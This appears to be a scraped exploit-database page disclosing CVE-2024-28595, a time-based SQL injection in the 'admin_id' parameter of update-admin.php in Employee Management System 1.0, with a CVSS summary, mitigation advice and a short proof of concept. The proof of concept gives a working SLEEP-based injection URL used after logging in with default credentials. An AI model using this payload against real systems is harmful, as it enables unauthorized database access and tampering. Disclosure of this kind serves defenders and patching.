Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-import-export-lite domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the insert-headers-and-footers domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121
Employee Management System 1.0 - 'admin_id' SQL Injection - exploit.company
header-logo
Suggest Exploit
vendor:
Employee Management System
by:
Shubham Pandey
6.1
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Employee Management System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: CVE-2024-28595
CPE: a:employee_management_system:employee_management_system:1.0
Metasploit:
Other Scripts:
Platforms Tested: Windows, Linux
2024

Employee Management System 1.0 – ‘admin_id’ SQL Injection

SQL Injection vulnerability in Employee Management System version 1.0 allows attackers to execute arbitrary SQL commands through the admin_id parameter in update-admin.php. An attacker can manipulate the admin_id parameter to inject malicious SQL queries, leading to unauthorized access or data manipulation.

Mitigation:

To mitigate this vulnerability, it is recommended to use parameterized queries or prepared statements to sanitize user inputs and prevent SQL injection attacks. Additionally, limiting database privileges and implementing proper input validation can help in preventing such attacks.
Source

Exploit-DB raw data:

# Exploit Title: Employee Management System 1.0 - 'admin_id' SQLi
# Date: 20-03-2024
# Exploit Author: Shubham Pandey
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html
# Version: 1.0
# Tested on: Windows, Linux
# CVE : CVE-2024-28595
# Description: SQL Injection vulnerability in Employee Management System v1.0 allows attackers to run arbitrary SQL commands via the admin_id parameter in update-admin.php.
# POC:
1. Here we go to : http://127.0.0.1/taskmatic/index.php
2. Now login with default Username and Password.
3. Visit the URL:
http://127.0.0.1/taskmatic/update-admin.php?admin_id=3'||(SELECT 0x697a7843
WHERE 5649=5649 AND (SELECT 2097 FROM (SELECT(SLEEP(5)))JzJH))||'
4. Page will load for 5 seconds because of time-based sql injection
# Reference:
https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-28595.md

Navigation

Suggest Exploit

Services By CQR

cqrsecured